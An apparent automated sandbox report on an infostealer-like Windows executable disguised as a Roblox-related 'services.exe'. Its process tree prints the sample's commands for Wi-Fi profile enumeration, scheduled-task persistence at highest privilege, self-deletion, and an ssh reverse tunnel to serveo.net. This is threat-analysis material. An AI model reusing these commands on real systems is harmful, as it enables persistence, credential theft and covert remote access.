Analysis
-
max time kernel
241s -
max time network
304s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
24-05-2024 01:23
Static task
static1
Behavioral task
behavioral1
Sample
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
Resource
win10-20240404-en
General
-
Target
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe
-
Size
2.8MB
-
MD5
63ba5ec400ebbe6af65441f442652faa
-
SHA1
3b8807f8124c0e0d8c8cd816f9a7bc30476fbf5c
-
SHA256
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9
-
SHA512
e240e9e07d88908057bba587e32ef1499d0c2d235eed61f1e996ce8959e1c323068ad483a96a7010ea0050440e12a0d82782e79baa186e880e4727452f3a4baf
-
SSDEEP
49152:2mVZpRE5HFjH4MLMmcX17+kSmn75+dEsgY5OK:fgvFcXV3cJ5
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
services.exeservices.exessh.exeservices.exeservices.exeservices.exeservices.exepid process 2872 services.exe 2060 services.exe 4704 ssh.exe 1908 services.exe 4724 services.exe 424 services.exe 4628 services.exe -
Loads dropped DLL 1 IoCs
Processes:
ssh.exepid process 4704 ssh.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exeservices.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 services.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 services.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 services.exe Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 68 timeout.exe 4584 timeout.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exeservices.exepid process 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe 2060 services.exe 2060 services.exe 2060 services.exe 2060 services.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exeservices.exeservices.exeservices.exeservices.exeservices.exeservices.exedescription pid process Token: SeDebugPrivilege 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe Token: SeDebugPrivilege 2872 services.exe Token: SeDebugPrivilege 2060 services.exe Token: SeDebugPrivilege 1908 services.exe Token: SeDebugPrivilege 4724 services.exe Token: SeDebugPrivilege 424 services.exe Token: SeDebugPrivilege 4628 services.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
services.exepid process 2060 services.exe -
Suspicious use of WriteProcessMemory 53 IoCs
Processes:
bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.execmd.execmd.exeservices.execmd.execmd.exeservices.execmd.execmd.exedescription pid process target process PID 824 wrote to memory of 1736 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe cmd.exe PID 824 wrote to memory of 1736 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe cmd.exe PID 1736 wrote to memory of 3164 1736 cmd.exe chcp.com PID 1736 wrote to memory of 3164 1736 cmd.exe chcp.com PID 1736 wrote to memory of 1372 1736 cmd.exe netsh.exe PID 1736 wrote to memory of 1372 1736 cmd.exe netsh.exe PID 1736 wrote to memory of 4784 1736 cmd.exe findstr.exe PID 1736 wrote to memory of 4784 1736 cmd.exe findstr.exe PID 824 wrote to memory of 2332 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe cmd.exe PID 824 wrote to memory of 2332 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe cmd.exe PID 2332 wrote to memory of 1912 2332 cmd.exe chcp.com PID 2332 wrote to memory of 1912 2332 cmd.exe chcp.com PID 2332 wrote to memory of 2908 2332 cmd.exe netsh.exe PID 2332 wrote to memory of 2908 2332 cmd.exe netsh.exe PID 2332 wrote to memory of 2596 2332 cmd.exe findstr.exe PID 2332 wrote to memory of 2596 2332 cmd.exe findstr.exe PID 824 wrote to memory of 2872 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe services.exe PID 824 wrote to memory of 2872 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe services.exe PID 824 wrote to memory of 1480 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe cmd.exe PID 824 wrote to memory of 1480 824 bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe cmd.exe PID 2872 wrote to memory of 1904 2872 services.exe cmd.exe PID 2872 wrote to memory of 1904 2872 services.exe cmd.exe PID 1480 wrote to memory of 780 1480 cmd.exe chcp.com PID 1480 wrote to memory of 780 1480 cmd.exe chcp.com PID 1904 wrote to memory of 1944 1904 cmd.exe chcp.com PID 1904 wrote to memory of 1944 1904 cmd.exe chcp.com PID 1480 wrote to memory of 4584 1480 cmd.exe timeout.exe PID 1480 wrote to memory of 4584 1480 cmd.exe timeout.exe PID 1904 wrote to memory of 68 1904 cmd.exe timeout.exe PID 1904 wrote to memory of 68 1904 cmd.exe timeout.exe PID 1904 wrote to memory of 1496 1904 cmd.exe schtasks.exe PID 1904 wrote to memory of 1496 1904 cmd.exe schtasks.exe PID 1904 wrote to memory of 2060 1904 cmd.exe services.exe PID 1904 wrote to memory of 2060 1904 cmd.exe services.exe PID 2060 wrote to memory of 2288 2060 services.exe cmd.exe PID 2060 wrote to memory of 2288 2060 services.exe cmd.exe PID 2288 wrote to memory of 2588 2288 cmd.exe chcp.com PID 2288 wrote to memory of 2588 2288 cmd.exe chcp.com PID 2288 wrote to memory of 1340 2288 cmd.exe netsh.exe PID 2288 wrote to memory of 1340 2288 cmd.exe netsh.exe PID 2288 wrote to memory of 784 2288 cmd.exe findstr.exe PID 2288 wrote to memory of 784 2288 cmd.exe findstr.exe PID 2060 wrote to memory of 3012 2060 services.exe cmd.exe PID 2060 wrote to memory of 3012 2060 services.exe cmd.exe PID 3012 wrote to memory of 4340 3012 cmd.exe chcp.com PID 3012 wrote to memory of 4340 3012 cmd.exe chcp.com PID 3012 wrote to memory of 4132 3012 cmd.exe netsh.exe PID 3012 wrote to memory of 4132 3012 cmd.exe netsh.exe PID 3012 wrote to memory of 4380 3012 cmd.exe findstr.exe PID 3012 wrote to memory of 4380 3012 cmd.exe findstr.exe PID 2060 wrote to memory of 4704 2060 services.exe ssh.exe PID 2060 wrote to memory of 4704 2060 services.exe ssh.exe PID 2060 wrote to memory of 4704 2060 services.exe ssh.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
services.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 services.exe -
outlook_win_path 1 IoCs
Processes:
services.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 services.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"1⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"3⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid3⤵
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"3⤵
-
C:\Users\Admin\AppData\Roaming\services.exe"C:\Users\Admin\AppData\Roaming\services.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "services" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Roaming\services.exe" &&START "" "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650014⤵
-
C:\Windows\system32\timeout.exetimeout /t 34⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "services" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"C:\Users\Admin\AppData\Local\RobloxSecurity\services.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"6⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650016⤵
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid6⤵
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"6⤵
-
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe"C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6060 serveo.net5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\bc00fef073d78e021e5273735cd8a75b55261a7564a01af944ed35f4513aadf9.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
C:\Windows\system32\timeout.exetimeout /t 33⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exeC:\Users\Admin\AppData\Local\RobloxSecurity\services.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exeC:\Users\Admin\AppData\Local\RobloxSecurity\services.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exeC:\Users\Admin\AppData\Local\RobloxSecurity\services.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exeC:\Users\Admin\AppData\Local\RobloxSecurity\services.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.logFilesize
847B
MD5a908a7c6e93edeb3e400780b6fe62dde
SHA136e2b437f41443f6b41b45b35a0f97b2cd94123d
SHA256cae801b0499949178298c1c1a083f7c0febb971d262be9c9588437af66c76ef0
SHA512deb437dcb1440d37bcd61dfa43be05fd01856a1d1e59aa5b2dfa142e9ae584b0577eea024edb99d8e74e3a1b606bb7ae3b4f9cd8eb30813e67dda678b9319cbe
-
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\libcrypto.dllFilesize
1.5MB
MD579a6e2268dfdba1d94c27f4b17265ff4
SHA1b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA2566562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
-
C:\Users\Admin\AppData\Local\RobloxSecurity\OpenSSH-Win32\ssh.exeFilesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
C:\Users\Admin\AppData\Local\RobloxSecurity\services.exeFilesize
120KB
MD5479d30cd484920e686388641718edc53
SHA1c7040a1893168c204c759280d9671b0b58890c8c
SHA256e4385e5feb8e6148b8bd24b5d3f86c9fb5f45c5520bbe7c08c01a8befd1c8601
SHA512e499941a4f0f0764ab7493f3f7aa588473409881aa4564a9939cfd60232bd1de672ecfc099d6712fa1eb4da272855f92c95fdf610f688c81894a6258cd3dd51d
-
C:\Users\Admin\AppData\Local\lbdd1brp2p\p.datFilesize
4B
MD5ba347fcc9a79fb74e95670b24848164f
SHA1f7627f1519939e9be9489509f793ed4d1d1d85e6
SHA256060e33205a731400c2eb92bc12cf921a4e44cf1851d216f144337dd6ec5350a7
SHA51265e3cba510a50198204ac82811e71c341a9558becf2a89cf52071a07fb65b15c1d27262b797566ac08173091ead35ddb8e54fa68f5e268cd78322d79e23f70d6
-
memory/824-3-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmpFilesize
9.9MB
-
memory/824-16-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmpFilesize
9.9MB
-
memory/824-5-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmpFilesize
9.9MB
-
memory/824-4-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmpFilesize
9.9MB
-
memory/824-0-0x00007FFC92233000-0x00007FFC92234000-memory.dmpFilesize
4KB
-
memory/824-2-0x00007FFC92230000-0x00007FFC92C1C000-memory.dmpFilesize
9.9MB
-
memory/824-1-0x00000000022C0000-0x00000000022E2000-memory.dmpFilesize
136KB
-
memory/2872-12-0x000002DE352A0000-0x000002DE352C4000-memory.dmpFilesize
144KB